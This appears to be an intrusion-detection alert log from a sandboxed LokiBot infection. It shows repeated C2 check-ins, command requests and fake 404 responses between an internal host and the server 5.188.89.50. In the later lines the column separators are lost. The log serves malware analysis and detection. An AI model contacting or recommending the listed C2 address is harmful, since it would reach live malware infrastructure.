                    09/28/21-06:50:46.621851 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49186 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:46.934038 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49187 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:46.934038 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49187 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:46.934038 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49187 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:46.934038 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49187 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:47.284598 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49187 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:47.567338 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49188 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:47.567338 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49188 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:47.567338 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49188 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:47.567338 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49188 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:47.929216 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49188 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:48.217751 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49189 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:48.217751 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49189 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:48.217751 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49189 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:48.217751 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49189 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:48.600374 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49189 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:48.901348 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49190 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:48.901348 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49190 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:48.901348 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49190 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:48.901348 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49190 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:49.275072 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49190 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:49.543983 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49191 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:49.543983 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49191 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:49.543983 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49191 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:49.543983 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49191 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:49.910859 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49191 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:50.201147 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49192 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:50.201147 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49192 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:50.201147 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49192 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:50.201147 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49192 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:50.559416 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49192 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:50.837246 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49193 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:50.837246 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49193 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:50.837246 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49193 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:50.837246 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49193 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:51.200425 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49193 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:51.664554 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49194 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:51.664554 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49194 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:51.664554 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49194 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:51.664554 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49194 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:52.034303 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49194 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:52.442627 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49195 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:52.442627 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49195 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:52.442627 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49195 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:52.442627 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49195 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:52.784750 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49195 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:53.378969 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49196 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:53.378969 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49196 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:53.378969 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49196 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:53.378969 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49196 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:53.741503 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49196 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:54.025805 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49197 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:54.025805 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49197 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:54.025805 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49197 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:54.025805 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49197 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:54.384705 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49197 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:54.678868 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49198 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:54.678868 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49198 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:54.678868 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49198 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:54.678868 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49198 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:55.031650 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49198 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:55.313486 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49199 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:55.313486 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49199 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:55.313486 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49199 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:55.313486 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49199 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:55.687469 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49199 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:55.987134 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49200 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:55.987134 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49200 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:55.987134 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49200 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:55.987134 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49200 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:56.347594 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49200 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:56.626190 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49201 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:56.626190 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49201 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:56.626190 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49201 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:56.626190 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49201 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:56.996386 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49201 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:57.284758 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49202 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:57.284758 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49202 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:57.284758 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49202 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:57.284758 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49202 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:57.618108 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49202 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:57.890671 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49203 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:57.890671 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49203 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:57.890671 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49203 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:57.890671 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49203 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:58.297915 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49203 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:58.583042 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49204 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:58.583042 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49204 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:58.583042 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49204 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:58.583042 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49204 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:58.927285 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49204 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:59.242791 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49205 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:59.242791 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49205 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:59.242791 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49205 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:59.242791 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49205 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:59.601230 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49205 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:50:59.885918 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49206 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:59.885918 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49206 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:59.885918 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49206 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:50:59.885918 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49206 | 80 | 192.168.2.22 | 5.188.89.50
                    09/28/21-06:51:00.245923 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49206 | 5.188.89.50 | 192.168.2.22
                    09/28/21-06:51:00.541294TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920780192.168.2.225.188.89.50
                    09/28/21-06:51:00.541294TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920780192.168.2.225.188.89.50
                    09/28/21-06:51:00.541294TCP2025381ET TROJAN LokiBot Checkin4920780192.168.2.225.188.89.50
                    09/28/21-06:51:00.541294TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920780192.168.2.225.188.89.50
                    09/28/21-06:51:00.899846TCP2025483ET TROJAN LokiBot Fake 404 Response80492075.188.89.50192.168.2.22
                    09/28/21-06:51:01.193570TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920880192.168.2.225.188.89.50
                    09/28/21-06:51:01.193570TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920880192.168.2.225.188.89.50
                    09/28/21-06:51:01.193570TCP2025381ET TROJAN LokiBot Checkin4920880192.168.2.225.188.89.50
                    09/28/21-06:51:01.193570TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920880192.168.2.225.188.89.50
                    09/28/21-06:51:01.549927TCP2025483ET TROJAN LokiBot Fake 404 Response80492085.188.89.50192.168.2.22
                    09/28/21-06:51:01.859269TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14920980192.168.2.225.188.89.50
                    09/28/21-06:51:01.859269TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4920980192.168.2.225.188.89.50
                    09/28/21-06:51:01.859269TCP2025381ET TROJAN LokiBot Checkin4920980192.168.2.225.188.89.50
                    09/28/21-06:51:01.859269TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24920980192.168.2.225.188.89.50
                    09/28/21-06:51:02.235016TCP2025483ET TROJAN LokiBot Fake 404 Response80492095.188.89.50192.168.2.22
                    09/28/21-06:51:02.517045TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921080192.168.2.225.188.89.50
                    09/28/21-06:51:02.517045TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921080192.168.2.225.188.89.50
                    09/28/21-06:51:02.517045TCP2025381ET TROJAN LokiBot Checkin4921080192.168.2.225.188.89.50
                    09/28/21-06:51:02.517045TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921080192.168.2.225.188.89.50
                    09/28/21-06:51:02.885141TCP2025483ET TROJAN LokiBot Fake 404 Response80492105.188.89.50192.168.2.22
                    09/28/21-06:51:03.156873TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921180192.168.2.225.188.89.50
                    09/28/21-06:51:03.156873TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921180192.168.2.225.188.89.50
                    09/28/21-06:51:03.156873TCP2025381ET TROJAN LokiBot Checkin4921180192.168.2.225.188.89.50
                    09/28/21-06:51:03.156873TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921180192.168.2.225.188.89.50
                    09/28/21-06:51:03.512490TCP2025483ET TROJAN LokiBot Fake 404 Response80492115.188.89.50192.168.2.22
                    09/28/21-06:51:03.819481TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921280192.168.2.225.188.89.50
                    09/28/21-06:51:03.819481TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921280192.168.2.225.188.89.50
                    09/28/21-06:51:03.819481TCP2025381ET TROJAN LokiBot Checkin4921280192.168.2.225.188.89.50
                    09/28/21-06:51:03.819481TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921280192.168.2.225.188.89.50
                    09/28/21-06:51:04.183722TCP2025483ET TROJAN LokiBot Fake 404 Response80492125.188.89.50192.168.2.22
                    09/28/21-06:51:04.459249TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921380192.168.2.225.188.89.50
                    09/28/21-06:51:04.459249TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921380192.168.2.225.188.89.50
                    09/28/21-06:51:04.459249TCP2025381ET TROJAN LokiBot Checkin4921380192.168.2.225.188.89.50
                    09/28/21-06:51:04.459249TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921380192.168.2.225.188.89.50
                    09/28/21-06:51:04.832233TCP2025483ET TROJAN LokiBot Fake 404 Response80492135.188.89.50192.168.2.22
                    09/28/21-06:51:05.091180TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921480192.168.2.225.188.89.50
                    09/28/21-06:51:05.091180TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921480192.168.2.225.188.89.50
                    09/28/21-06:51:05.091180TCP2025381ET TROJAN LokiBot Checkin4921480192.168.2.225.188.89.50
                    09/28/21-06:51:05.091180TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921480192.168.2.225.188.89.50
                    09/28/21-06:51:05.442715TCP2025483ET TROJAN LokiBot Fake 404 Response80492145.188.89.50192.168.2.22
                    09/28/21-06:51:05.699797TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921580192.168.2.225.188.89.50
                    09/28/21-06:51:05.699797TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921580192.168.2.225.188.89.50
                    09/28/21-06:51:05.699797TCP2025381ET TROJAN LokiBot Checkin4921580192.168.2.225.188.89.50
                    09/28/21-06:51:05.699797TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921580192.168.2.225.188.89.50
                    09/28/21-06:51:06.041813TCP2025483ET TROJAN LokiBot Fake 404 Response80492155.188.89.50192.168.2.22
                    09/28/21-06:51:06.324511TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921680192.168.2.225.188.89.50
                    09/28/21-06:51:06.324511TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921680192.168.2.225.188.89.50
                    09/28/21-06:51:06.324511TCP2025381ET TROJAN LokiBot Checkin4921680192.168.2.225.188.89.50
                    09/28/21-06:51:06.324511TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921680192.168.2.225.188.89.50
                    09/28/21-06:51:06.690603TCP2025483ET TROJAN LokiBot Fake 404 Response80492165.188.89.50192.168.2.22
                    09/28/21-06:51:06.958702TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921780192.168.2.225.188.89.50
                    09/28/21-06:51:06.958702TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921780192.168.2.225.188.89.50
                    09/28/21-06:51:06.958702TCP2025381ET TROJAN LokiBot Checkin4921780192.168.2.225.188.89.50
                    09/28/21-06:51:06.958702TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921780192.168.2.225.188.89.50
                    09/28/21-06:51:07.319648TCP2025483ET TROJAN LokiBot Fake 404 Response80492175.188.89.50192.168.2.22
                    09/28/21-06:51:07.603166TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921880192.168.2.225.188.89.50
                    09/28/21-06:51:07.603166TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921880192.168.2.225.188.89.50
                    09/28/21-06:51:07.603166TCP2025381ET TROJAN LokiBot Checkin4921880192.168.2.225.188.89.50
                    09/28/21-06:51:07.603166TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921880192.168.2.225.188.89.50
                    09/28/21-06:51:07.964447TCP2025483ET TROJAN LokiBot Fake 404 Response80492185.188.89.50192.168.2.22
                    09/28/21-06:51:08.233327TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14921980192.168.2.225.188.89.50
                    09/28/21-06:51:08.233327TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4921980192.168.2.225.188.89.50
                    09/28/21-06:51:08.233327TCP2025381ET TROJAN LokiBot Checkin4921980192.168.2.225.188.89.50
                    09/28/21-06:51:08.233327TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24921980192.168.2.225.188.89.50
                    09/28/21-06:51:08.589641TCP2025483ET TROJAN LokiBot Fake 404 Response80492195.188.89.50192.168.2.22
                    09/28/21-06:51:08.841041TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922080192.168.2.225.188.89.50
                    09/28/21-06:51:08.841041TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922080192.168.2.225.188.89.50
                    09/28/21-06:51:08.841041TCP2025381ET TROJAN LokiBot Checkin4922080192.168.2.225.188.89.50
                    09/28/21-06:51:08.841041TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922080192.168.2.225.188.89.50
                    09/28/21-06:51:09.186378TCP2025483ET TROJAN LokiBot Fake 404 Response80492205.188.89.50192.168.2.22
                    09/28/21-06:51:09.444019TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922180192.168.2.225.188.89.50
                    09/28/21-06:51:09.444019TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922180192.168.2.225.188.89.50
                    09/28/21-06:51:09.444019TCP2025381ET TROJAN LokiBot Checkin4922180192.168.2.225.188.89.50
                    09/28/21-06:51:09.444019TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922180192.168.2.225.188.89.50
                    09/28/21-06:51:09.822865TCP2025483ET TROJAN LokiBot Fake 404 Response80492215.188.89.50192.168.2.22
                    09/28/21-06:51:10.077283TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922280192.168.2.225.188.89.50
                    09/28/21-06:51:10.077283TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922280192.168.2.225.188.89.50
                    09/28/21-06:51:10.077283TCP2025381ET TROJAN LokiBot Checkin4922280192.168.2.225.188.89.50
                    09/28/21-06:51:10.077283TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922280192.168.2.225.188.89.50
                    09/28/21-06:51:10.430120TCP2025483ET TROJAN LokiBot Fake 404 Response80492225.188.89.50192.168.2.22
                    09/28/21-06:51:10.687078TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922380192.168.2.225.188.89.50
                    09/28/21-06:51:10.687078TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922380192.168.2.225.188.89.50
                    09/28/21-06:51:10.687078TCP2025381ET TROJAN LokiBot Checkin4922380192.168.2.225.188.89.50
                    09/28/21-06:51:10.687078TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922380192.168.2.225.188.89.50
                    09/28/21-06:51:11.051528TCP2025483ET TROJAN LokiBot Fake 404 Response80492235.188.89.50192.168.2.22
                    09/28/21-06:51:11.328729TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922480192.168.2.225.188.89.50
                    09/28/21-06:51:11.328729TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922480192.168.2.225.188.89.50
                    09/28/21-06:51:11.328729TCP2025381ET TROJAN LokiBot Checkin4922480192.168.2.225.188.89.50
                    09/28/21-06:51:11.328729TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922480192.168.2.225.188.89.50
                    09/28/21-06:51:11.678843TCP2025483ET TROJAN LokiBot Fake 404 Response80492245.188.89.50192.168.2.22
                    09/28/21-06:51:11.924109TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922580192.168.2.225.188.89.50
                    09/28/21-06:51:11.924109TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922580192.168.2.225.188.89.50
                    09/28/21-06:51:11.924109TCP2025381ET TROJAN LokiBot Checkin4922580192.168.2.225.188.89.50
                    09/28/21-06:51:11.924109TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922580192.168.2.225.188.89.50
                    09/28/21-06:51:12.290453TCP2025483ET TROJAN LokiBot Fake 404 Response80492255.188.89.50192.168.2.22
                    09/28/21-06:51:12.548479TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922680192.168.2.225.188.89.50
                    09/28/21-06:51:12.548479TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922680192.168.2.225.188.89.50
                    09/28/21-06:51:12.548479TCP2025381ET TROJAN LokiBot Checkin4922680192.168.2.225.188.89.50
                    09/28/21-06:51:12.548479TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922680192.168.2.225.188.89.50
                    09/28/21-06:51:12.908386TCP2025483ET TROJAN LokiBot Fake 404 Response80492265.188.89.50192.168.2.22
                    09/28/21-06:51:13.189129TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922780192.168.2.225.188.89.50
                    09/28/21-06:51:13.189129TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922780192.168.2.225.188.89.50
                    09/28/21-06:51:13.189129TCP2025381ET TROJAN LokiBot Checkin4922780192.168.2.225.188.89.50
                    09/28/21-06:51:13.189129TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922780192.168.2.225.188.89.50
                    09/28/21-06:51:13.544518TCP2025483ET TROJAN LokiBot Fake 404 Response80492275.188.89.50192.168.2.22
                    09/28/21-06:51:13.815165TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922880192.168.2.225.188.89.50
                    09/28/21-06:51:13.815165TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4922880192.168.2.225.188.89.50
                    09/28/21-06:51:13.815165TCP2025381ET TROJAN LokiBot Checkin4922880192.168.2.225.188.89.50
                    09/28/21-06:51:13.815165TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24922880192.168.2.225.188.89.50
                    09/28/21-06:51:14.177796TCP2025483ET TROJAN LokiBot Fake 404 Response80492285.188.89.50192.168.2.22
                    09/28/21-06:51:14.436115TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14922980192.168.2.225.188.89.50
